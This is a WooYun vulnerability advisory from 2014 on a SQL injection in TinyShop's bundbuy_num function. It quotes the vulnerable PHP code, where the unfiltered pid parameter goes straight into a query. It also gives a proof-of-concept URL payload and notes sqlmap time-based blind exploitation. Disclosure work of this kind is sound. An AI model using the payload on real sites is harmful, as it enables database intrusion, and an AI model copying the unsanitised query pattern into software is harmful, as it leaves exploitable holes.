当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073724

漏洞标题:TinyShop SQL注入

相关厂商:tinyrise.com

漏洞作者: zxx

提交时间:2014-08-27 14:33

修复时间:2014-11-25 14:34

公开时间:2014-11-25 14:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-08-28: 厂商已经确认,细节仅向厂商公开
2014-08-31: 细节向第三方安全合作伙伴开放
2014-10-22: 细节向核心白帽子及相关领域专家公开
2014-11-01: 细节向普通白帽子公开
2014-11-11: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

未过滤,导致注入

详细说明:

问题出现在/protected/controllers/simple.php中:

//捆绑商品数量
public function bundbuy_num(){
$id = Filter::int(Req::args('id'));
$num = Filter::int(Req::args('num'));
if($num<=0)$num = 1;
$product_id = Req::args('pid');//pid参数未过滤直接传给$product_id
$product_ids = preg_replace('/-/i', ',', $product_id);//$product_id将字符串中-替换为,后传给$product_ids
$model = new Model("bundling");
$bund = $model->where("id=$id")->find();
if($bund){//为了条件语句执行,$id要存在。
$goods_id = $bund['goods_id'];
$products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id")->group("go.id")->findAll();//$product_ids直接放入查询语句中
$products = $this->packBundbuyProducts($products);
}
$weight = 0;
$max_num = $num;
foreach ($products as $prod) {
$weight += $prod['weight'];
if($max_num>$prod['store_nums'])$max_num = $prod['store_nums'];
}
$num = $max_num;
$amount = sprintf("%01.2f",$bund['price'] * $num);
$product[$product_id] = array('id'=>$product_ids,'goods_id'=>'','name'=>'','img'=>'','num'=>$num,'store_nums'=>$num,'price'=>$bund['price'],'spec'=>array(),'amount'=>$amount,'sell_total'=>$amount,'weight'=>$weight,'point'=>'',"prom_goods"=>array(),"sell_price"=>$bund['price'],"real_price"=>$bund['price']);
echo JSON::encode($product);
}

漏洞证明:

http://localhost/index.php?con=simple&act=bundbuy_num&id=1&num=1&pid=1,2,3,4) and 1=1 %23

QQ截图20140824203047.png

QQ截图20140824203116.png


用sqlmap跑一下,pid是注入参数,又是基于时间盲注

QQ截图20140824204828.png

修复方案:

过滤一下

版权声明:转载请注明来源 zxx@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-28 16:18

厂商回复:

非常感谢您为TinyShop信息安全做的贡献,此问题已经360库带反馈,不过仍然感谢你的支持。

最新状态:

暂无